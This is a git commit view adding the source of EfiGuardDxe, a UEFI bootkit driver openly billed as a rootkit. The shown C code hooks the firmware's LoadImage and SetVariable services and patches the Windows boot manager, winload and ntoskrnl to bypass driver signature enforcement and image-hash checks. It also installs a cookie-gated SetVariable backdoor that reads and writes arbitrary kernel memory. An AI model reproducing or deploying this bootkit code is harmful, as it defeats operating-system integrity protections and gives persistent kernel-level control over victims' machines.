aboutsummaryrefslogtreecommitdiff
path: root/EfiGuardDxe
diff options
context:
space:
mode:
authorMattiwatti <mattiwatti@gmail.com>2019-03-25 20:56:43 +0100
committerMattiwatti <mattiwatti@gmail.com>2019-03-25 20:56:43 +0100
commit0be8f445b64ab36e086bd7e3a2913fdd147bd00f (patch)
tree50e94db7d2f159f621f17096162c97a5e471cfa4 /EfiGuardDxe
Initial commitv1.0
Diffstat (limited to 'EfiGuardDxe')
-rw-r--r--EfiGuardDxe/EfiGuardDxe.c639
-rw-r--r--EfiGuardDxe/EfiGuardDxe.h223
-rw-r--r--EfiGuardDxe/EfiGuardDxe.inf85
-rw-r--r--EfiGuardDxe/EfiGuardDxe.vcxproj96
-rw-r--r--EfiGuardDxe/EfiGuardDxe.vcxproj.filters200
-rw-r--r--EfiGuardDxe/PatchBootmgr.c372
-rw-r--r--EfiGuardDxe/PatchNtoskrnl.c661
-rw-r--r--EfiGuardDxe/PatchWinload.c683
-rw-r--r--EfiGuardDxe/VisualUefi.c108
m---------EfiGuardDxe/Zydis0
-rw-r--r--EfiGuardDxe/arc.h1317
-rw-r--r--EfiGuardDxe/ntdef.h80
-rw-r--r--EfiGuardDxe/pe.c502
-rw-r--r--EfiGuardDxe/pe.h252
-rw-r--r--EfiGuardDxe/util.c380
-rw-r--r--EfiGuardDxe/util.h120
16 files changed, 5718 insertions, 0 deletions
diff --git a/EfiGuardDxe/EfiGuardDxe.c b/EfiGuardDxe/EfiGuardDxe.c
new file mode 100644
index 0000000..df2528f
--- /dev/null
+++ b/EfiGuardDxe/EfiGuardDxe.c
@@ -0,0 +1,639 @@
+#include "EfiGuardDxe.h"
+
+#include <Protocol/Shell.h>
+#include <Guid/EventGroup.h>
+#include <Library/BaseMemoryLib.h>
+#include <Library/DevicePathLib.h>
+#include <Library/SynchronizationLib.h>
+
+//
+// EFI Driver Version Protocol
+//
+EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL gEfiGuardSupportedEfiVersion =
+{
+ sizeof(EFI_DRIVER_SUPPORTED_EFI_VERSION_PROTOCOL),
+ EFI_2_10_SYSTEM_TABLE_REVISION
+};
+
+//
+// EfiGuard driver protocol
+//
+EFI_STATUS
+EFIAPI
+DriverConfigure(
+ IN EFIGUARD_CONFIGURATION_DATA* ConfigurationData
+ );
+
+EFIGUARD_DRIVER_PROTOCOL gEfiGuardDriverProtocol =
+{
+ DriverConfigure
+};
+
+//
+// Default driver configuration used if Configure() is not called
+//
+EFIGUARD_CONFIGURATION_DATA gDriverConfig = {
+ DSE_DISABLE_SETVARIABLE_HOOK, // DseBypassMethod
+ FALSE // WaitForKeyPress
+};
+
+//
+// Bootmgfw.efi handle
+//
+EFI_HANDLE gBootmgfwHandle = NULL;
+
+//
+// EFI runtime globals
+//
+EFI_EVENT gEfiExitBootServicesEvent = NULL;
+BOOLEAN gEfiAtRuntime = FALSE;
+EFI_EVENT gEfiVirtualNotifyEvent = NULL;
+BOOLEAN gEfiGoneVirtual = FALSE;
+
+//
+// Original gBS->LoadImage pointer
+//
+STATIC EFI_IMAGE_LOAD mOriginalLoadImage = NULL;
+
+//
+// Original gRT->SetVariable pointer
+//
+STATIC EFI_SET_VARIABLE mOriginalSetVariable = NULL;
+
+#if defined(MDE_CPU_X64)
+#define MM_SYSTEM_RANGE_START (VOID*)(0xFFFF080000000000) // Windows XP through 7 value. On newer systems this is a bit higher, but not that much
+#elif defined(MDE_CPU_IA32)
+#define MM_SYSTEM_RANGE_START (VOID*)(0x80000000)
+#endif
+
+// Title (adapted from original by Dude719)
+#define EFIGUARD_TITLE1 L"\r\n ██╗ ██╗ ██╗ ██╗ ██╗ " \
+ L"\r\n ████╗ ████║ ██████╗████████╗████████╗╚═╝ " \
+ L"\r\n ██║ ██╔═██║██╔════██╗ ██╔══╝ ██╔══╝██╗ " \
+ L"\r\n ██║ ╚═╝ ██║██║ ██║ ██║ ██║ ██║ "
+#define EFIGUARD_TITLE2 L"\r\n ██║ ██║ ╚███████║ █████╗ █████╗██║ " \
+ L"\r\n ╚═╝ ╚═╝ ╚══════╝ ╚════╝ ╚════╝╚═╝ " \
+ L"\r\n " \
+ L"\r\n Rootkits You Can Trust (TM) \r\n"
+
+
+//
+// (Un)hooks a service table pointer, replacing its value with NewFunction and returning the original address.
+//
+VOID*
+SetServicePointer(
+ IN OUT EFI_TABLE_HEADER *ServiceTableHeader,
+ IN OUT VOID **ServiceTableFunction,
+ IN VOID *NewFunction
+ )
+{
+ if (ServiceTableFunction == NULL || NewFunction == NULL)
+ return NULL;
+
+ // If this is really needed after boot time at some point the CRC function is easy enough to reimplement
+ ASSERT(gBS != NULL);
+ ASSERT(gBS->CalculateCrc32 != NULL);
+
+ CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli
+
+ VOID* OriginalFunction = InterlockedCompareExchangePointer(ServiceTableFunction,
+ *ServiceTableFunction,
+ NewFunction);
+
+ // Recalculate the table checksum
+ ServiceTableHeader->CRC32 = 0;
+ gBS->CalculateCrc32((UINT8*)ServiceTableHeader, ServiceTableHeader->HeaderSize, &ServiceTableHeader->CRC32);
+
+ gBS->RestoreTPL(Tpl);
+
+ return OriginalFunction;
+}
+
+//
+// Boot Services LoadImage hook
+//
+EFI_STATUS
+EFIAPI
+HookedLoadImage(
+ IN BOOLEAN BootPolicy,
+ IN EFI_HANDLE ParentImageHandle,
+ IN EFI_DEVICE_PATH_PROTOCOL *DevicePath,
+ IN VOID *SourceBuffer OPTIONAL,
+ IN UINTN SourceSize,
+ OUT EFI_HANDLE *ImageHandle
+ )
+{
+ // Try to get a readable file path from the EFI shell protocol if it's available
+ EFI_SHELL_PROTOCOL* EfiShellProtocol = NULL;
+ CONST EFI_STATUS EfiShellStatus = gBS->LocateProtocol(&gEfiShellProtocolGuid,
+ NULL,
+ (VOID**)&EfiShellProtocol);
+ CHAR16* ImagePath = NULL;
+ if (!EFI_ERROR(EfiShellStatus))
+ {
+ ImagePath = EfiShellProtocol->GetFilePathFromDevicePath(DevicePath);
+ }
+ if (ImagePath == NULL)
+ {
+ ImagePath = ConvertDevicePathToText(DevicePath, TRUE, TRUE);
+ }
+
+ // We only have a filename to go on at this point. We will determine the final 'is this bootmgfw.efi?' status after the image has been loaded
+ CONST BOOLEAN MaybeBootmgfw = ImagePath != NULL
+ ? (StrStr(ImagePath, L"bootmgfw.efi") != NULL || StrStr(ImagePath, L"BOOTMGFW.EFI") != NULL ||
+ StrStr(ImagePath, L"bootx64.efi") != NULL || StrStr(ImagePath, L"BOOTX64.EFI") != NULL)
+ : FALSE;
+ CONST BOOLEAN IsBoot = (MaybeBootmgfw || (BootPolicy == TRUE && SourceBuffer == NULL));
+
+ // Print what's being loaded or booted
+ CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, FALSE);
+ Print(L"[HookedLoadImage] %S %S\r\n (ParentImageHandle = %llx)\r\n",
+ (IsBoot ? L"Booting" : L"Loading"), ImagePath, (UINTN)ParentImageHandle);
+ if (ImagePath != NULL)
+ FreePool(ImagePath);
+ RtlSleep(500);
+
+ // Q: If we loaded bootmgfw.efi manually, is there any benefit to flipping BootPolicy to TRUE
+ // to make it look like the load request came straight from the boot manager?
+ if (MaybeBootmgfw)
+ {
+ // Let's find out
+ BootPolicy = TRUE;
+ }
+
+ // Load the image
+ CONST EFI_STATUS Status = mOriginalLoadImage(BootPolicy,
+ ParentImageHandle,
+ DevicePath,
+ SourceBuffer,
+ SourceSize,
+ ImageHandle);
+
+ // Was this a successful load of an image that's being booted?
+ if (!EFI_ERROR(Status) && IsBoot && *ImageHandle != NULL)
+ {
+ // Get loaded image info
+ EFI_LOADED_IMAGE_PROTOCOL *LoadedImage = NULL;
+ CONST EFI_STATUS ImageInfoStatus = gBS->OpenProtocol(*ImageHandle,
+ &gEfiLoadedImageProtocolGuid,
+ (VOID**)&LoadedImage,
+ gImageHandle,
+ NULL,
+ EFI_OPEN_PROTOCOL_GET_PROTOCOL);
+ if (EFI_ERROR(ImageInfoStatus))
+ {
+ Print(L"\r\nHookedLoadImage: failed to get loaded image info. Status: %llx (%r)\r\n",
+ ImageInfoStatus, ImageInfoStatus);
+ }
+ else
+ {
+ // Determine the type of file we're loading
+ CONST INPUT_FILETYPE FileType = GetInputFileType((UINT8*)LoadedImage->ImageBase, LoadedImage->ImageSize);
+ ASSERT(FileType == Unknown || FileType == Bootmgr || FileType == BootmgfwEfi);
+
+ if (FileType == BootmgfwEfi)
+ {
+ // This is bootmgfw.efi. Save the returned image handle
+ gBootmgfwHandle = *ImageHandle;
+ LoadedImage->ParentHandle = NULL;
+
+ // Print image info
+ PrintLoadedImageInfo(LoadedImage);
+
+ // Nuke it dot it
+ PatchBootManager(FileType,
+ LoadedImage->ImageBase,
+ LoadedImage->ImageSize);
+ }
+ }
+ }
+
+ gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute);
+ gST->ConOut->EnableCursor(gST->ConOut, FALSE);
+
+ return Status;
+}
+
+//
+// Runtime Services SetVariable hook
+//
+EFI_STATUS
+EFIAPI
+HookedSetVariable(
+ IN CHAR16 *VariableName,
+ IN EFI_GUID *VendorGuid,
+ IN UINT32 Attributes,
+ IN UINTN DataSize,
+ IN VOID *Data
+ )
+{
+ // We should not be hooking the runtime table after ExitBootServices() unless this is the selected DSE bypass method
+ ASSERT(!gEfiAtRuntime || gDriverConfig.DseBypassMethod == DSE_DISABLE_SETVARIABLE_HOOK);
+
+ // Do we have a match for the variable name and vendor GUID?
+ if (gEfiAtRuntime && gEfiGoneVirtual &&
+ VariableName != NULL && VariableName[0] != CHAR_NULL && VendorGuid != NULL &&
+ CompareGuid(VendorGuid, EFIGUARD_BACKDOOR_VARIABLE_GUID) &&
+ StrnCmp(VariableName, EFIGUARD_BACKDOOR_VARIABLE_NAME, (sizeof(EFIGUARD_BACKDOOR_VARIABLE_NAME) / sizeof(CHAR16)) - 1) == 0)
+ {
+ // Yep. Do we have any data?
+ if (DataSize == 0 && Data == NULL)
+ {
+ // Nope. This is the first SetVariable() call from the HAL, intended to wipe the variable.
+ // (This call may be skipped if EFI_VARIABLE_APPEND_WRITE is set, but this is version-dependent)
+ return EFI_SUCCESS;
+ }
+
+ if ((Attributes & EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES) == EFIGUARD_BACKDOOR_VARIABLE_ATTRIBUTES &&
+ DataSize == EFIGUARD_BACKDOOR_VARIABLE_DATASIZE &&
+ Data != NULL)
+ {
+ // Yep, and Attributes and DataSize are correct. Check if *Data is a valid input for a backdoor read/write operation
+ EFIGUARD_BACKDOOR_DATA* BackdoorData = (EFIGUARD_BACKDOOR_DATA*)Data;
+ if (BackdoorData->CookieValue == EFIGUARD_BACKDOOR_COOKIE_VALUE &&
+ BackdoorData->Size > 0 &&
+ (UINTN)BackdoorData->KernelAddress >= (UINTN)MM_SYSTEM_RANGE_START)
+ {
+ if (BackdoorData->IsMemCopy && BackdoorData->u.UserBuffer != NULL)
+ {
+ if (BackdoorData->IsReadOperation) // Copy kernel buffer to user address
+ CopyMem(BackdoorData->u.UserBuffer, BackdoorData->KernelAddress, BackdoorData->Size);
+ else // Copy user buffer to kernel address
+ CopyMem(BackdoorData->KernelAddress, BackdoorData->u.UserBuffer, BackdoorData->Size);
+ }
+ else
+ {
+ // Copy user scalar to kernel memory, and put the old value in BackdoorData->u.XXX
+ switch (BackdoorData->Size)
+ {
+ case 1:
+ {
+ CONST UINT8 NewByte = (UINT8)BackdoorData->u.s.Byte;
+ BackdoorData->u.s.Byte = *(UINT8*)BackdoorData->KernelAddress;
+ if (!BackdoorData->IsReadOperation)
+ *(UINT8*)BackdoorData->KernelAddress = NewByte;
+ break;
+ }
+ case 2:
+ {
+ CONST UINT16 NewWord = (UINT16)BackdoorData->u.s.Word;
+ BackdoorData->u.s.Word = *(UINT16*)BackdoorData->KernelAddress;
+ if (!BackdoorData->IsReadOperation)
+ *(UINT16*)BackdoorData->KernelAddress = NewWord;
+ break;
+ }
+ case 4:
+ {
+ CONST UINT32 NewDword = (UINT32)BackdoorData->u.s.Dword;
+ BackdoorData->u.s.Dword = *(UINT32*)BackdoorData->KernelAddress;
+ if (!BackdoorData->IsReadOperation)
+ *(UINT32*)BackdoorData->KernelAddress = NewDword;
+ break;
+ }
+ case 8:
+ {
+ CONST UINT64 NewQword = (UINT64)BackdoorData->u.Qword;
+ BackdoorData->u.Qword = *(UINT64*)BackdoorData->KernelAddress;
+ if (!BackdoorData->IsReadOperation)
+ *(UINT64*)BackdoorData->KernelAddress = NewQword;
+ break;
+ }
+ default:
+ break; // Invalid size; do nothing
+ }
+ }
+
+ // Backdoor complete
+ return EFI_SUCCESS;
+ }
+ //else { /*Invalid EFIGUARD_BACKDOOR_DATA* provided*/ }
+ }
+ //else { /*Data is NULL, or DataSize/Attributes mismatch*/ }
+ }
+ //else { /*Not our variable name + vendor GUID, or SetVirtualAddressMap() has not been called yet*/ }
+
+ return mOriginalSetVariable(VariableName, VendorGuid, Attributes, DataSize, Data);
+}
+
+//
+// ExitBootServices callback
+//
+VOID
+EFIAPI
+ExitBootServicesEvent(
+ IN EFI_EVENT Event,
+ IN VOID* Context
+ )
+{
+ // Close this event now. The boot loader only calls this once.
+ gBS->CloseEvent(gEfiExitBootServicesEvent);
+ gEfiExitBootServicesEvent = NULL;
+
+ // The message buffer may be empty if the patch process was aborted in one of the earlier stages
+ if (gKernelPatchInfo.Buffer[0] != CHAR_NULL)
+ {
+ CONST EFI_STATUS Status = gKernelPatchInfo.Status;
+ CONST INT32 OriginalAttribute = gST->ConOut->Mode->Attribute;
+ if (Status == EFI_SUCCESS)
+ {
+ SetConsoleTextColour(EFI_GREEN, TRUE);
+ PrintKernelPatchInfo();
+ Print(L"\r\nSuccessfully patched ntoskrnl.exe.\r\n");
+
+ if (gDriverConfig.WaitForKeyPress)
+ {
+ Print(L"\r\nPress any key to continue.\r\n");
+ WaitForKey();
+ }
+ }
+ else
+ {
+ // Patch failed. Most important stuff first: make a fake BSOD, because... reasons
+ // TODO if really bored: use GOP to set the BG colour on the whole screen.
+ // Could add one of those obnoxious Win 10 :( smileys and a QR code
+ gST->ConOut->SetAttribute(gST->ConOut, EFI_WHITE | EFI_BACKGROUND_BLUE);
+ gST->ConOut->ClearScreen(gST->ConOut);
+
+ Print(L"A problem has been detected and Windows has been paused to prevent damage\r\nto your botnets.\r\n\r\n"
+ L"BOOTKIT_KERNEL_PATCH_FAILED\r\n\r\n"
+ L"Technical information:\r\n\r\n*** STOP: 0X%llX (%r, 0x%p)\r\n\r\n",
+ Status, Status, gKernelPatchInfo.KernelBase);
+ PrintKernelPatchInfo();
+
+ // Give time for user to register their loss and allow for the grieving process to set in
+ RtlSleep(2000);
+
+ // Prompt user to ask what they want to do
+ Print(L"\r\nPress any key to continue anyway, or press ESC to reboot.\r\n");
+ if (!WaitForKey())
+ {
+ gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL);
+ }
+ }
+
+ gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute);
+ if (Status != EFI_SUCCESS)
+ gST->ConOut->ClearScreen(gST->ConOut);
+ }
+
+ // If the DSE bypass method is *not* DSE_DISABLE_SETVARIABLE_HOOK, perform some cleanup now. In principle this should allow
+ // linking with /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER, because our driver image may be freed after this callback returns.
+ // Using DSE_DISABLE_SETVARIABLE_HOOK requires linking with /SUBSYSTEM:EFI_RUNTIME_DRIVER, because the image must not be freed.
+ if (gDriverConfig.DseBypassMethod != DSE_DISABLE_SETVARIABLE_HOOK)
+ {
+ // Uninstall our installed driver protocols
+ gBS->UninstallMultipleProtocolInterfaces(gImageHandle,
+ &gEfiGuardDriverProtocolGuid,
+ &gEfiGuardDriverProtocol,
+ &gEfiDriverSupportedEfiVersionProtocolGuid,
+ &gEfiGuardSupportedEfiVersion,
+ NULL);
+
+ // Unregister SetVirtualAddressMap() notification
+ if (gEfiVirtualNotifyEvent != NULL)
+ {
+ gBS->CloseEvent(gEfiVirtualNotifyEvent);
+ gEfiVirtualNotifyEvent = NULL;
+ }
+
+ // Unhook gRT->SetVariable
+ if (mOriginalSetVariable != NULL)
+ {
+ SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID*)mOriginalSetVariable);
+ mOriginalSetVariable = NULL;
+ }
+ }
+
+ // Regardless of which OS is being booted, boot services won't be available after this callback returns
+ gBS = NULL;
+ mOriginalLoadImage = NULL;
+ gEfiAtRuntime = TRUE;
+}
+
+//
+// SetVirtualAddressMap callback
+//
+VOID
+EFIAPI
+SetVirtualAddressMapEvent(
+ IN EFI_EVENT Event,
+ IN VOID* Context
+ )
+{
+ ASSERT(gEfiAtRuntime == TRUE);
+ ASSERT(gBS == NULL);
+ gEfiVirtualNotifyEvent = NULL;
+
+ // Convert the original SetVariable pointer to virtual so our hook will continue to work
+ EFI_STATUS Status = gRT->ConvertPointer(0, (VOID**)&mOriginalSetVariable);
+ ASSERT_EFI_ERROR(Status);
+
+ // Convert the runtime services pointer itself from physical to virtual
+ Status = gRT->ConvertPointer(0, (VOID**)&gRT);
+ ASSERT_EFI_ERROR(Status);
+
+ // Set the flag indicating virtual addressing mode has been entered
+ gEfiGoneVirtual = TRUE;
+}
+
+EFI_STATUS
+EFIAPI
+DriverConfigure(
+ IN EFIGUARD_CONFIGURATION_DATA* ConfigurationData
+ )
+{
+ // Do not allow configure if we are at runtime, or if the Windows boot manager has been loaded
+ if (gEfiAtRuntime || gBootmgfwHandle != NULL)
+ return EFI_ACCESS_DENIED;
+
+ if (ConfigurationData == NULL)
+ return EFI_INVALID_PARAMETER;
+
+ gDriverConfig = *ConfigurationData;
+
+ Print(L"Configuration data accepted.\r\n\r\n");
+
+ return EFI_SUCCESS;
+}
+
+//
+// Driver unload
+//
+EFI_STATUS
+EFIAPI
+EfiGuardUnload(
+ IN EFI_HANDLE ImageHandle
+ )
+{
+ // Do not allow unload if we are at runtime, or if the Windows boot manager has been loaded
+ if (gEfiAtRuntime || gBootmgfwHandle != NULL)
+ {
+ return EFI_ACCESS_DENIED;
+ }
+
+ ASSERT(gBS != NULL);
+
+ // Uninstall our installed driver protocols
+ gBS->UninstallMultipleProtocolInterfaces(gImageHandle,
+ &gEfiGuardDriverProtocolGuid,
+ &gEfiGuardDriverProtocol,
+ &gEfiDriverSupportedEfiVersionProtocolGuid,
+ &gEfiGuardSupportedEfiVersion,
+ NULL);
+
+ // Unregister SetVirtualAddressMap() notification
+ if (gEfiVirtualNotifyEvent != NULL)
+ {
+ gBS->CloseEvent(gEfiVirtualNotifyEvent);
+ gEfiVirtualNotifyEvent = NULL;
+ }
+
+ // Unregister ExitBootServices() notification
+ if (gEfiExitBootServicesEvent != NULL)
+ {
+ gBS->CloseEvent(gEfiExitBootServicesEvent);
+ gEfiExitBootServicesEvent = NULL;
+ }
+
+ // Unhook gRT->SetVariable
+ if (mOriginalSetVariable != NULL)
+ {
+ SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID*)mOriginalSetVariable);
+ mOriginalSetVariable = NULL;
+ }
+
+ // Unhook gBS->LoadImage
+ if (mOriginalLoadImage != NULL)
+ {
+ SetServicePointer(&gBS->Hdr, (VOID**)&gBS->LoadImage, (VOID*)mOriginalLoadImage);
+ mOriginalLoadImage = NULL;
+ }
+
+ return EFI_SUCCESS;
+}
+
+//
+// Main entry point
+//
+EFI_STATUS
+EFIAPI
+EfiGuardInitialize(
+ IN EFI_HANDLE ImageHandle,
+ IN EFI_SYSTEM_TABLE *SystemTable
+ )
+{
+ ASSERT(ImageHandle == gImageHandle);
+
+ // Check if we're not already loaded.
+ EFIGUARD_DRIVER_PROTOCOL* EfiGuardDriverProtocol;
+ EFI_STATUS Status = gBS->LocateProtocol(&gEfiGuardDriverProtocolGuid,
+ NULL,
+ (VOID**)&EfiGuardDriverProtocol);
+ if (Status != EFI_NOT_FOUND)
+ {
+ Print(L"An instance of the driver is already loaded.\r\n");
+ return EFI_ALREADY_STARTED;
+ }
+
+ //
+ // Install supported EFI version protocol
+ //
+ Status = gBS->InstallMultipleProtocolInterfaces(&gImageHandle,
+ &gEfiDriverSupportedEfiVersionProtocolGuid,
+ &gEfiGuardSupportedEfiVersion,
+ NULL);
+ if (EFI_ERROR(Status))
+ {
+ Print(L"Failed to install EFI Driver Supported Version protocol. Error: %llx (%r)\r\n", Status, Status);
+ return Status;
+ }
+
+ //
+ // Install EfiGuard driver protocol
+ //
+ Status = gBS->InstallProtocolInterface(&gImageHandle,
+ &gEfiGuardDriverProtocolGuid,
+ EFI_NATIVE_INTERFACE,
+ &gEfiGuardDriverProtocol);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ //
+ // Clear screen and print header
+ //
+ CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, TRUE);
+ Print(L"\r\n\r\n");
+ Print(L"%S", EFIGUARD_TITLE1);
+ Print(L"%S", EFIGUARD_TITLE2);
+ gST->ConOut->SetAttribute(gST->ConOut, OriginalAttribute);
+
+ EFI_LOADED_IMAGE_PROTOCOL *LocalImageInfo;
+ Status = gBS->OpenProtocol(gImageHandle,
+ &gEfiLoadedImageProtocolGuid,
+ (VOID**)&LocalImageInfo,
+ gImageHandle,
+ NULL,
+ EFI_OPEN_PROTOCOL_GET_PROTOCOL);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ PrintLoadedImageInfo(LocalImageInfo);
+
+ //
+ // Hook gBS->LoadImage
+ //
+ mOriginalLoadImage = (EFI_IMAGE_LOAD)SetServicePointer(&gBS->Hdr, (VOID**)&gBS->LoadImage, (VOID*)&HookedLoadImage);
+ Print(L"Hooked gBS->LoadImage: 0x%p -> 0x%p\r\n", (VOID*)mOriginalLoadImage, (VOID*)&HookedLoadImage);
+
+ //
+ // Hook gRT->SetVariable
+ //
+ mOriginalSetVariable = (EFI_SET_VARIABLE)SetServicePointer(&gRT->Hdr, (VOID**)&gRT->SetVariable, (VOID**)&HookedSetVariable);
+ Print(L"Hooked gRT->SetVariable: 0x%p -> 0x%p\r\n", (VOID*)mOriginalSetVariable, (VOID*)&HookedSetVariable);
+
+ // Register notification callback for ExitBootServices()
+ Status = gBS->CreateEventEx(EVT_NOTIFY_SIGNAL,
+ TPL_NOTIFY,
+ ExitBootServicesEvent,
+ NULL,
+ &gEfiEventExitBootServicesGuid,
+ &gEfiExitBootServicesEvent);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ // Register notification callback for SetVirtualAddressMap()
+ Status = gBS->CreateEventEx(EVT_NOTIFY_SIGNAL,
+ TPL_NOTIFY,
+ SetVirtualAddressMapEvent,
+ NULL,
+ &gEfiEventVirtualAddressChangeGuid,
+ &gEfiVirtualNotifyEvent);
+ if (EFI_ERROR(Status))
+ goto Exit;
+
+ // Initialize the global kernel patch info struct.
+ gKernelPatchInfo.Status = EFI_SUCCESS;
+ gKernelPatchInfo.BufferSize = 0;
+ SetMem64(gKernelPatchInfo.Buffer, sizeof(gKernelPatchInfo.Buffer), 0ULL);
+ gKernelPatchInfo.LegacyLoaderBlock = FALSE;
+ gKernelPatchInfo.KernelBase = NULL;
+
+ // Wipe our image info and PE headers
+ LocalImageInfo->DeviceHandle = LocalImageInfo->FilePath = LocalImageInfo->ParentHandle = NULL;
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(LocalImageInfo->ImageBase, LocalImageInfo->ImageSize);
+ ZeroMem(LocalImageInfo->ImageBase, NtHeaders->OptionalHeader.SizeOfHeaders);
+
+ // The ASCII banner is very pretty - ensure the user has enough time to admire it
+ RtlSleep(1500);
+
+Exit:
+ if (EFI_ERROR(Status))
+ {
+ Print(L"\r\nEfiGuardDxe initialization failed with status %llx (%r)\r\n", Status, Status);
+
+ // Because we do not use the driver binding protocol, recovering from a failed load is simple.
+ // We can just call the unload function, which will only unload that which was actually installed.
+ EfiGuardUnload(gImageHandle);
+ }
+ return Status;
+}
diff --git a/EfiGuardDxe/EfiGuardDxe.h b/EfiGuardDxe/EfiGuardDxe.h
new file mode 100644
index 0000000..e26dc5e
--- /dev/null
+++ b/EfiGuardDxe/EfiGuardDxe.h
@@ -0,0 +1,223 @@
+#pragma once
+
+#include <Uefi.h>
+
+#include <Protocol/DriverSupportedEfiVersion.h>
+#include <Protocol/EfiGuard.h>
+#include <Library/UefiLib.h>
+#include <Library/DebugLib.h>
+#include <Library/MemoryAllocationLib.h>
+#include <Library/UefiBootServicesTableLib.h>
+#include <Library/UefiRuntimeServicesTableLib.h>
+
+#include <Zydis/Zydis.h>
+#include "ntdef.h"
+#include "pe.h"
+#include "arc.h"
+#include "util.h"
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+//
+// EfiGuard driver protocol handle
+//
+extern EFIGUARD_DRIVER_PROTOCOL gEfiGuardDriverProtocol;
+
+//
+// Driver configuration data
+//
+extern EFIGUARD_CONFIGURATION_DATA gDriverConfig;
+
+//
+// Bootmgfw.efi handle
+//
+extern EFI_HANDLE gBootmgfwHandle;
+
+//
+// TRUE if ExitBootServices() has been called
+//
+extern BOOLEAN gEfiAtRuntime;
+
+//
+// TRUE if SetVirtualAddressMap() has been called
+//
+extern BOOLEAN gEfiGoneVirtual;
+
+//
+// Universal template bytes for a faux call inline hook (mov [e|r]ax, <addr>, push [e|r]ax, ret)
+//
+extern CONST UINT8 gHookTemplate[(sizeof(VOID*) / 4) + sizeof(VOID*) + 2];
+
+
+//
+// [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication hook to patch either winload.efi or bootmgr.efi
+// This function was named ImgArchEfiStartBootApplication on versions <= 10.0.16299.0, later simply ImgArchStartBootApplication.
+//
+// Windows Vista/7 prototype
+typedef
+EFI_STATUS
+(EFIAPI*
+t_ImgArchStartBootApplication_Vista)(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ );
+
+// Windows 8+ prototype
+typedef
+EFI_STATUS
+(EFIAPI*
+t_ImgArchStartBootApplication_Eight)(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ IN UINT32 BootOption,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ );
+
+extern VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgfwImgArchStartBootApplication;
+extern UINT8 gBootmgfwImgArchStartBootApplicationBackup[sizeof(gHookTemplate)];
+
+// This is only used if bootmgr.efi is invoked during the boot process
+extern VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgrImgArchStartBootApplication;
+extern UINT8 gBootmgrImgArchStartBootApplicationBackup[sizeof(gHookTemplate)];
+
+
+//
+// Patches the Windows Boot Manager: either bootmgfw.efi or bootmgr.efi; normally the former unless booting a WIM file
+//
+EFI_STATUS
+EFIAPI
+PatchBootManager(
+ IN INPUT_FILETYPE FileType,
+ IN VOID* ImageBase,
+ IN UINTN ImageSize
+ );
+
+
+//
+// winload!OslFwpKernelSetupPhase1 hook
+//
+typedef
+EFI_STATUS
+(EFIAPI*
+t_OslFwpKernelSetupPhase1)(
+ IN PLOADER_PARAMETER_BLOCK LoaderBlock
+ );
+
+extern t_OslFwpKernelSetupPhase1 gOriginalOslFwpKernelSetupPhase1;
+extern UINT8 gOslFwpKernelSetupPhase1Backup[sizeof(gHookTemplate)];
+
+EFI_STATUS
+EFIAPI
+HookedOslFwpKernelSetupPhase1(
+ IN PLOADER_PARAMETER_BLOCK LoaderBlock
+ );
+
+
+//
+// Patches winload.efi
+//
+EFI_STATUS
+EFIAPI
+PatchWinload(
+ IN VOID* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ );
+
+//
+// Patches ImgpValidateImageHash in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe]
+// This patch is completely optional, unless you want to boot a custom kernel or winload image.
+// It is applied if possible, but failures are ignored.
+//
+EFI_STATUS
+EFIAPI
+PatchImgpValidateImageHash(
+ IN INPUT_FILETYPE FileType,
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ );
+
+//
+// Patches ImgpFilterValidationFailure in bootmgfw.efi, bootmgr.efi, and winload.[efi|exe]
+// This patch is completely optional, unless you want to boot a custom kernel or winload image.
+// It is applied if possible, but failures are ignored.
+//
+EFI_STATUS
+EFIAPI
+PatchImgpFilterValidationFailure(
+ IN INPUT_FILETYPE FileType,
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ );
+
+//
+// winload!BlStatusPrint. This is not hooked, but used to print debug output to kd or WinDbg
+// from the OslFwpKernelSetupPhase1 hook (in which gST->ConOut is no longer available)
+//
+typedef
+NTSTATUS
+(EFIAPI*
+t_BlStatusPrint)(
+ IN CONST CHAR16 *Format,
+ ...
+ );
+
+extern t_BlStatusPrint gBlStatusPrint;
+
+NTSTATUS
+EFIAPI
+BlStatusPrintNoop(
+ IN CONST CHAR16 *Format,
+ ...
+ );
+
+
+//
+// Patches ntoskrnl.exe
+//
+EFI_STATUS
+EFIAPI
+PatchNtoskrnl(
+ IN VOID* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders
+ );
+
+
+//
+// The kernel patch result. This is used to hold data generated during
+// HookedOslFwpKernelSetupPhase1 and PatchNtoskrnl until we can safely access
+// boot services to print the output. This is done during the ExitBootServices() callback.
+//
+// Status holds the final patch status. If this is not EFI_SUCCESS, the buffer holds an
+// error message, and the user will be prompted to reboot or continue.
